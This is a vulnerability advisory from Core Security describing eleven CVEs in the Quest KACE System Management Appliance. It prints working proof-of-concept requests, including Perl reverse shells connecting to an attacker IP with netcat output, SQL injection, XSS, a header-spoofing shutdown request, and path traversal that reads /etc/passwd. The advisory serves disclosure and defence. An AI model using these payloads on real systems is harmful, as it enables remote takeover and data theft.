10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.923 High
EPSS
Percentile
99.0%
**Title:**Quest KACE System Management Appliance Multiple Vulnerabilities
**Advisory ID:**CORE-2018-0004
Advisory URL:<https://www.coresecurity.com/core-labs/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities>
**Date published:**2018-05-31
**Date of last update:**2018-05-22
**Vendors contacted:**Quest Software Inc.
**Release mode:**Forced release
**Class:**Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73]
**Impact:**Code execution
**Remotely Exploitable:**Yes
**Locally Exploitable:**Yes
CVE Name:CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
From Quest KACE’s website:
“The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization’s systems management needs, from initial deployment to ongoing management and retirement.”
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest’s definition of “responsible disclosure” can be found at <https://support.quest.com/essentials/reporting-security-vulnerability>.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest’s posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
Other products and versions might be affected too, but they were not tested.
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
[CVE-2018-11138] The ‘/common/download_agent_installer.php’ script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table ‘CLIENT_DISTRIBUTION’ and fetching the contents of the ‘VERSION’ column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table ‘ORGANIZATION’ and the column ‘ID’.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
- platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows)
The following proof of concept executes a reverse shell:
GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0
$ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www)
[CVE-2018-11139] The ‘/common/ajax_email_connection_test.php’ script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input ‘TEST_SERVER’ sent to the script via POST method.
The following proof of concept executes a reverse shell:
POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@ eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@ eaea.com&ACTION=TEST_CONNECTION_SMTP
$ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www)
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script ‘/adminui/error_details.php’ to inject arbitrary PHP objects.
To exploit this issue, the parameter ‘ERROR_MESSAGES’ needs to be an array and meet some specific conditions in order to successfully exploit the issue.
[CVE-2018-11134] In order to perform actions that requires higher privileges, the application relies on a message queue managed that runs with root privileges and only allows a set of commands.
One of the available commands allows to change any user’s password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the ‘kace_support’ account, which comes disabled by default but has full sudo privileges.
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
[CVE-2018-11142] ‘systemui/settings_network.php’ and ‘systemui/settings_patching.php’ scripts are accessible only from localhost. This restriction can be bypassed by modifying the ‘Host’ and ‘X_Forwarded_For’ HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129--
[CVE-2018-11136] The ‘orgID’ parameter received by the ‘/common/download_agent_installer.php’ script is not sanitized, leading to SQL injection. In particular, a blind time based type.
The following proof of concept induces a time delay:
http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152
[CVE-2018-11140] The ‘reportID’ parameter received by the ‘/common/run_report.php’ script is not sanitized, leading to SQL injection. In particular, an error based type.
The following proof of concept retrieves the current database name:
POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie] date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf
HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8 [...SNIPPED...] <script type="text/javascript" src="/common/js/vendor/html5.js?BUILD=318" /></script> <![endif]--><title>Report Queued: qppjqORG1qjpqq</title><meta http-equiv='refresh' [...SNIPPED...]
[CVE-2018-11133] The ‘fmt’ parameter of the ‘/common/run_cross_report.php’ script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952
[CVE-2018-11137] The ‘checksum’ parameter of the ‘/common/download_attachment.php’ script can be abused to read arbitrary files with ‘www’ privileges. The following proof of concept reads the ‘/etc/passwd’ file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with ‘www’ privileges, such as all the files located in ‘/kbox/bin/koneas/keys/’ and ‘/kbox/kboxwww/include/globals.inc’, which contain plaintext passwords.
http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952
The following proof of concept demonstrates the vulnerability:
GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream # $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $ # root:*:0:0:Charlie &:/root:/bin/csh daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]
[CVE-2018-11141] The ‘IMAGES_JSON’ and ‘attachments_to_remove[]’ parameters of the ‘/adminui/advisory.php’ script can be abused to write and delete files respectively. The following proof of concept creates a file located at ‘/kbox/kboxwww/resources/TestWrite’ with the content ‘Sarasa’ (base64 encoded). Files can be at any location where the ‘www’ user has write permissions.
File deletion could be abused to delete ‘/kbox/kboxwww/systemui/reports/setup_completed.log’ file. This file’s existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1 -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN" 99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON" {"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...]
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
[root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite
[1] <https://www.quest.com/products/kace-systems-management-appliance/>
CoreLabs, the research center of Core Security, A Fortra Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>.
Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
The contents of this advisory are copyright © 2018 Core Security and © 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.923 High
EPSS
Percentile
99.0%